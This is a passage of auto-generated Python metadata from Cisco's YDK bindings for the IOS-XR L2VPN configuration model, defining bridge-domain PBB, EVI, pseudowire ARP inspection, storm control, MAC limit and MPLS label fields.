'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis',
False,
[
_MetaInfoClassMember('pbb-core-evi', REFERENCE_LIST, 'PbbCoreEvi' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis.PbbCoreEvi',
[], [],
''' PBB Core EVI
''',
'pbb_core_evi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-evis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreDhcpProfile' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreDhcpProfile',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-dhcp-profile',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Bridge Domain PBB Core
Configuration
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-dhcp-profile', REFERENCE_CLASS, 'PbbCoreDhcpProfile' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreDhcpProfile',
[], [],
''' Attach a DHCP profile
''',
'pbb_core_dhcp_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-evis', REFERENCE_CLASS, 'PbbCoreEvis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis',
[], [],
''' PBB Core EVI Table
''',
'pbb_core_evis',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-igmp-profile', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a IGMP Snooping profile
''',
'pbb_core_igmp_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac', REFERENCE_CLASS, 'PbbCoreMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac',
[], [],
''' MAC configuration commands
''',
'pbb_core_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mmrp-flood-optimization', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enabling MMRP PBB-VPLS Flood Optimization
''',
'pbb_core_mmrp_flood_optimization',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vlan-id', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' VLAN ID to push
''',
'vlan_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb',
False,
[
_MetaInfoClassMember('pbb-core', REFERENCE_CLASS, 'PbbCore' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore',
[], [],
''' PBB Core
''',
'pbb_core',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edges', REFERENCE_CLASS, 'PbbEdges' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges',
[], [],
''' PBB Edge
''',
'pbb_edges',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-pbb',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis.BridgeDomainEvi' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis.BridgeDomainEvi',
False,
[
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-evi',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis',
False,
[
_MetaInfoClassMember('bridge-domain-evi', REFERENCE_LIST, 'BridgeDomainEvi' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis.BridgeDomainEvi',
[], [],
''' Bridge Domain EVI
''',
'bridge_domain_evi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-evis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai.PseudowireDaiAddressValidation' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai.PseudowireDaiAddressValidation',
False,
[
_MetaInfoClassMember('destination-mac-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' Destination MAC Verification
''',
'destination_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ipv4-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' IPv4 Verification
''',
'ipv4_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-mac-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' Source MAC Verification
''',
'source_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-dai-address-validation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai',
False,
[
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable Dynamic ARP Inspection
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Access Pseudowire Dynamic ARP
Inspection
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' Logging Type
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-dai-address-validation', REFERENCE_CLASS, 'PseudowireDaiAddressValidation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai.PseudowireDaiAddressValidation',
[], [],
''' Address Validation
''',
'pseudowire_dai_address_validation',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-dai',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType.StormControlUnit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType.StormControlUnit',
False,
[
_MetaInfoClassMember('kbits-per-sec', ATTRIBUTE, 'int' , None, None,
[('64', '1280000')], [],
''' Kilobits Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'kbits_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pkts-per-sec', ATTRIBUTE, 'int' , None, None,
[('1', '160000')], [],
''' Packets Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'pkts_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'storm-control-unit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType',
False,
[
_MetaInfoClassMember('sctype', REFERENCE_ENUM_CLASS, 'StormControlEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'StormControlEnum',
[], [],
''' Storm Control Type
''',
'sctype',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('storm-control-unit', REFERENCE_CLASS, 'StormControlUnit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType.StormControlUnit',
[], [],
''' Specify units for Storm Control Configuration
''',
'storm_control_unit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bdpw-storm-control-type',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes',
False,
[
_MetaInfoClassMember('bdpw-storm-control-type', REFERENCE_LIST, 'BdpwStormControlType' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType',
[], [],
''' Storm Control Type
''',
'bdpw_storm_control_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bdpw-storm-control-types',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireProfile' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireProfile',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-profile',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses.BdPwStaticMacAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses.BdPwStaticMacAddress',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-static-mac-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses',
False,
[
_MetaInfoClassMember('bd-pw-static-mac-address', REFERENCE_LIST, 'BdPwStaticMacAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses.BdPwStaticMacAddress',
[], [],
''' Static Mac Address Configuration
''',
'bd_pw_static_mac_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-static-mac-addresses',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireIpSourceGuard' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireIpSourceGuard',
False,
[
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable Dynamic IP source guard
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IP Source Guard
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' Logging Type
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-ip-source-guard',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacSecure' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacSecure',
False,
[
_MetaInfoClassMember('action', REFERENCE_ENUM_CLASS, 'MacSecureActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacSecureActionEnum',
[], [],
''' MAC secure enforcement action
''',
'action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable L2 Pseudowire MAC Secure
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MAC Secure
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' MAC Secure Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-mac-secure',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacAging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacAging',
False,
[
_MetaInfoClassMember('pseudowire-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
''' MAC Aging Time
''',
'pseudowire_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'pseudowire_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacLimit',
False,
[
_MetaInfoClassMember('pseudowire-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' Bridge Access Pseudowire MAC address
limit enforcement action
''',
'pseudowire_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses on a Bridge
Access Pseudowire after which MAC limit
action is taken
''',
'pseudowire_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
''' MAC address limit notification action
in a Bridge Access Pseudowire
''',
'pseudowire_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Bridge-domain Pseudowire MAC
configuration mode
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-aging', REFERENCE_CLASS, 'PseudowireMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'pseudowire_mac_aging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-learning', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
''' Enable MAC Learning
''',
'pseudowire_mac_learning',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-limit', REFERENCE_CLASS, 'PseudowireMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'pseudowire_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-port-down-flush', REFERENCE_ENUM_CLASS, 'PortDownFlushEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'PortDownFlushEnum',
[], [],
''' Enable/Disable MAC Flush When Port goes
down
''',
'pseudowire_mac_port_down_flush',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-secure', REFERENCE_CLASS, 'PseudowireMacSecure' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacSecure',
[], [],
''' MAC Secure
''',
'pseudowire_mac_secure',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon.BdPwSplitHorizonGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon.BdPwSplitHorizonGroup',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable split horizon group
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-split-horizon-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon',
False,
[
_MetaInfoClassMember('bd-pw-split-horizon-group', REFERENCE_CLASS, 'BdPwSplitHorizonGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon.BdPwSplitHorizonGroup',
[], [],
''' Split Horizon Group
''',
'bd_pw_split_horizon_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-split-horizon',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwMplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwMplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires.BridgeDomainBackupPseudowire' : {
